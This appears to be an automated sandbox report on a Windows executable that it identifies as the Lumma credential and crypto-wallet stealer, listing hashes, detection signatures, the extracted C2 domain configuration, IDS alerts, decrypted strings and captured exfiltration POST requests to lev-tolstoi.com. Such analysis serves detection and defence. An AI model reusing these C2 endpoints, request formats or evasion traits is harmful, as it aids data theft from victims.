Windows Analysis Report
4KDKJjRzm8.exe

Overview

General Information

Sample name: 4KDKJjRzm8.exe (renamed because original name is a hash value)
Original sample name: 6be43af1d47558e4993b9c341da5a653.exe
Analysis ID: 1580888
MD5: 6be43af1d47558e4993b9c341da5a653
SHA1: 0bef6b68199ee1f205326d3289b39102978ec1f5
SHA256: 7e13dd0f50e0ded479413d1061d1d2f73fd2e51639e8b29b22776b4d0ab5368d
Tags: exe, user-abuse_ch
Infos:

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • 4KDKJjRzm8.exe (PID: 1460 cmdline: "C:\Users\user\Desktop\4KDKJjRzm8.exe" MD5: 6BE43AF1D47558E4993B9C341DA5A653)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware configuration:
{"C2 url": ["curverpluch.lat", "bashfulacid.lat", "observerfry.lat", "talkynicer.lat", "shapestickyr.lat", "tentabatte.lat", "manyrestro.lat", "slipperyloo.lat", "wordyfindy.lat"], "Build id": "PsFKDg--pablo"}
Yara matches (PCAP):

Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

Yara matches (memory dumps):

Source | Rule | Description | Author | Strings
00000000.00000003.1488959320.0000000001360000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.1515928263.000000000135D000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.1539387547.000000000131E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.1488193272.000000000135F000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
No Sigma rule has matched

Suricata alerts:

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-26T12:54:09.261620+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49722 | 23.55.153.106 | 443 | TCP
2024-12-26T12:54:11.746899+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49728 | 172.67.157.254 | 443 | TCP
2024-12-26T12:54:13.868234+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49734 | 172.67.157.254 | 443 | TCP
2024-12-26T12:54:16.670208+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49740 | 172.67.157.254 | 443 | TCP
2024-12-26T12:54:18.942161+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49746 | 172.67.157.254 | 443 | TCP
2024-12-26T12:54:21.673727+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49752 | 172.67.157.254 | 443 | TCP
2024-12-26T12:54:24.413493+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49761 | 172.67.157.254 | 443 | TCP
2024-12-26T12:54:26.955349+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49768 | 172.67.157.254 | 443 | TCP
2024-12-26T12:54:30.039493+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49776 | 172.67.157.254 | 443 | TCP
2024-12-26T12:54:12.519459+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.9 | 49728 | 172.67.157.254 | 443 | TCP
2024-12-26T12:54:14.667605+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.9 | 49734 | 172.67.157.254 | 443 | TCP
2024-12-26T12:54:12.519459+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.9 | 49728 | 172.67.157.254 | 443 | TCP
2024-12-26T12:54:14.667605+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.9 | 49734 | 172.67.157.254 | 443 | TCP
2024-12-26T12:54:07.476243+0100 | 2058480 | 1 | Domain Observed Used for C2 Detected | 192.168.2.9 | 53558 | 1.1.1.1 | 53 | UDP
2024-12-26T12:54:07.191673+0100 | 2058484 | 1 | Domain Observed Used for C2 Detected | 192.168.2.9 | 56553 | 1.1.1.1 | 53 | UDP
2024-12-26T12:54:06.767453+0100 | 2058492 | 1 | Domain Observed Used for C2 Detected | 192.168.2.9 | 54260 | 1.1.1.1 | 53 | UDP
2024-12-26T12:54:06.907983+0100 | 2058500 | 1 | Domain Observed Used for C2 Detected | 192.168.2.9 | 52498 | 1.1.1.1 | 53 | UDP
2024-12-26T12:54:06.397092+0100 | 2058502 | 1 | Domain Observed Used for C2 Detected | 192.168.2.9 | 59931 | 1.1.1.1 | 53 | UDP
2024-12-26T12:54:07.050281+0100 | 2058510 | 1 | Domain Observed Used for C2 Detected | 192.168.2.9 | 50519 | 1.1.1.1 | 53 | UDP
2024-12-26T12:54:07.334564+0100 | 2058512 | 1 | Domain Observed Used for C2 Detected | 192.168.2.9 | 60232 | 1.1.1.1 | 53 | UDP
2024-12-26T12:54:06.257510+0100 | 2058514 | 1 | Domain Observed Used for C2 Detected | 192.168.2.9 | 50508 | 1.1.1.1 | 53 | UDP
2024-12-26T12:54:25.170601+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49761 | 172.67.157.254 | 443 | TCP
2024-12-26T12:54:10.065762+0100 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.9 | 49722 | 23.55.153.106 | 443 | TCP

AV Detection

Source: 4KDKJjRzm8.exe | Avira: detected
Source: https://lev-tolstoi.com/pitT | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/api) | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/s | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/piD | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/pi0 | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/pi4 | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/iaj | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/qo | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/ARE | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/stT | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/te | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com//Passw | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/ients/ | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/apitly | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/apin | Avira URL Cloud: Label: malware
Source: 4KDKJjRzm8.exe.1460.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["curverpluch.lat", "bashfulacid.lat", "observerfry.lat", "talkynicer.lat", "shapestickyr.lat", "tentabatte.lat", "manyrestro.lat", "slipperyloo.lat", "wordyfindy.lat"], "Build id": "PsFKDg--pablo"}
Source: 4KDKJjRzm8.exe | ReversingLabs: Detection: 63%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 4KDKJjRzm8.exe | Joe Sandbox ML: detected

Source: 00000000.00000003.1368448305.0000000005140000.00000004.00001000.00020000.00000000.sdmp | String decryptor output:
  bashfulacid.lat
  tentabatte.lat
  curverpluch.lat
  talkynicer.lat
  shapestickyr.lat
  manyrestro.lat
  slipperyloo.lat
  wordyfindy.lat
  observerfry.lat
  lid=%s&j=%s&ver=4.0
  TeslaBrowser/5.5
  - Screen Resoluton:
  - Physical Installed Memory:
  Workgroup: -
  PsFKDg--pablo

Source: C:\Users\user\Desktop\4KDKJjRzm8.exe | Code function: 0_2_009957C0 CryptUnprotectData, 0_2_009957C0
Source: 4KDKJjRzm8.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown | HTTPS traffic detected (version: TLS 1.2):
  23.55.153.106:443 -> 192.168.2.9:49722
  172.67.157.254:443 -> 192.168.2.9:49728
  172.67.157.254:443 -> 192.168.2.9:49734
  172.67.157.254:443 -> 192.168.2.9:49740
  172.67.157.254:443 -> 192.168.2.9:49746
  172.67.157.254:443 -> 192.168.2.9:49752
  172.67.157.254:443 -> 192.168.2.9:49761
  172.67.157.254:443 -> 192.168.2.9:49768

Networking

Source: Network traffic | Suricata IDS alerts (Severity 1):
  2058502 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (slipperyloo .lat) : 192.168.2.9:59931 -> 1.1.1.1:53
  2058500 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shapestickyr .lat) : 192.168.2.9:52498 -> 1.1.1.1:53
  2058480 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bashfulacid .lat) : 192.168.2.9:53558 -> 1.1.1.1:53
  2058492 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (manyrestro .lat) : 192.168.2.9:54260 -> 1.1.1.1:53
  2058484 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curverpluch .lat) : 192.168.2.9:56553 -> 1.1.1.1:53
  2058512 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tentabatte .lat) : 192.168.2.9:60232 -> 1.1.1.1:53
  2058510 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (talkynicer .lat) : 192.168.2.9:50519 -> 1.1.1.1:53
  2058514 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wordyfindy .lat) : 192.168.2.9:50508 -> 1.1.1.1:53
  2048094 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.9:49761 -> 172.67.157.254:443
  2858666 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.9:49722 -> 23.55.153.106:443
  2049812 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.9:49734 -> 172.67.157.254:443
  2054653 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49734 -> 172.67.157.254:443
  2049836 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:49728 -> 172.67.157.254:443
  2054653 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49728 -> 172.67.157.254:443

Source: Malware configuration extractor | URLs:
  curverpluch.lat
  bashfulacid.lat
  observerfry.lat
  talkynicer.lat
  shapestickyr.lat
  tentabatte.lat
  manyrestro.lat
  slipperyloo.lat
  wordyfindy.lat

Source: Joe Sandbox View | IP Address: 172.67.157.254
Source: Joe Sandbox View | IP Address: 23.55.153.106
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic | Suricata IDS alerts (Severity 3), 2028371 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update:
  192.168.2.9:49740 -> 172.67.157.254:443
  192.168.2.9:49746 -> 172.67.157.254:443
  192.168.2.9:49722 -> 23.55.153.106:443
  192.168.2.9:49752 -> 172.67.157.254:443
  192.168.2.9:49734 -> 172.67.157.254:443
  192.168.2.9:49761 -> 172.67.157.254:443
  192.168.2.9:49776 -> 172.67.157.254:443
  192.168.2.9:49768 -> 172.67.157.254:443
  192.168.2.9:49728 -> 172.67.157.254:443

Source: global traffic | HTTP traffic detected:
  GET /profiles/76561199724331900 HTTP/1.1
  Connection: Keep-Alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Host: steamcommunity.com

Source: global traffic | HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 8
  Host: lev-tolstoi.com

Source: global traffic | HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 47
  Host: lev-tolstoi.com

Source: global traffic | HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: multipart/form-data; boundary=O0KPXZESU3AA06KV
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 12833
  Host: lev-tolstoi.com

Source: global traffic | HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: multipart/form-data; boundary=AI1H7NMTB09653LBR
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 15057
  Host: lev-tolstoi.com

Source: global traffic | HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: multipart/form-data; boundary=PCKY9Q7KIM5
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 20537
  Host: lev-tolstoi.com

Source: global traffic | HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: multipart/form-data; boundary=Y6D6EX0ZTZ3UD39FU1K
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 1226
  Host: lev-tolstoi.com

Source: global traffic | HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: multipart/form-data; boundary=4K5AXWGSDPDJ4LF
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 585194
  Host: lev-tolstoi.com

Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global traffic. DNS traffic detected: DNS query: observerfry.lat
                Source: global traffic. DNS traffic detected: DNS query: wordyfindy.lat
                Source: global traffic. DNS traffic detected: DNS query: slipperyloo.lat
                Source: global traffic. DNS traffic detected: DNS query: manyrestro.lat
                Source: global traffic. DNS traffic detected: DNS query: shapestickyr.lat
                Source: global traffic. DNS traffic detected: DNS query: talkynicer.lat
                Source: global traffic. DNS traffic detected: DNS query: curverpluch.lat
                Source: global traffic. DNS traffic detected: DNS query: tentabatte.lat
                Source: global traffic. DNS traffic detected: DNS query: bashfulacid.lat
                Source: global traffic. DNS traffic detected: DNS query: steamcommunity.com
                Source: global traffic. DNS traffic detected: DNS query: lev-tolstoi.com
                Source: unknown. HTTP traffic detected:
                    POST /api HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Content-Length: 8
                    Host: lev-tolstoi.com
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1516290444.0000000005CB6000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1539246157.0000000005CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1539369110.0000000005CB9000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1516348850.0000000005CB8000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1610249625.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000002.1614778336.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1513284186.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1516290444.0000000005CB6000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1582545384.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1539309056.0000000001360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1539309056.0000000001360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com//Passw
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1438106482.00000000012F9000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.00000000012F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/3
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1488959320.0000000001360000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1515928263.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1488193272.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1513284186.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1539309056.0000000001360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/ARE
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1513399465.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1539387547.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1543528478.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1488231577.000000000131E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/J
                Source: 4KDKJjRzm8.exe, 4KDKJjRzm8.exe, 00000000.00000003.1610641364.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1613444081.00000000012D8000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1613613036.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1565125707.000000000136D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000002.1614536555.00000000012D8000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000002.1614720928.000000000131E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1539387547.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1543528478.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1488231577.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1513371568.000000000132D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api)
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apih
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1613301096.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1610249625.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000002.1614778336.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1582545384.0000000001370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apilT
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1539309056.0000000001360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apin
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1515928263.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1513284186.000000000135D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apitly
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1610249625.0000000001361000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1613301096.0000000001366000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000002.1614778336.0000000001366000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/iaj
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1515928263.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1513284186.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1539309056.0000000001360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/ients/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1613301096.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000002.1614778336.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1513284186.000000000135D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi0
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1543231877.000000000136F000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1542773608.000000000136D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1565125707.000000000136D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1610249625.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1582545384.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1539309056.0000000001360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi4
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1488959320.0000000001360000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1488193272.000000000135F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/piD
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1613301096.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1610249625.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000002.1614778336.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1582545384.0000000001370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pitT
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1613301096.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1610249625.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000002.1614778336.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1582545384.0000000001370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/qo
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1565125707.000000000136D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1610249625.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000002.1614778336.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1582545384.0000000001370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/s
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1613301096.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1565125707.000000000136D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1610249625.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000002.1614778336.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1582545384.0000000001370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/srd
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1565125707.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/stT
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1565125707.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/te
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
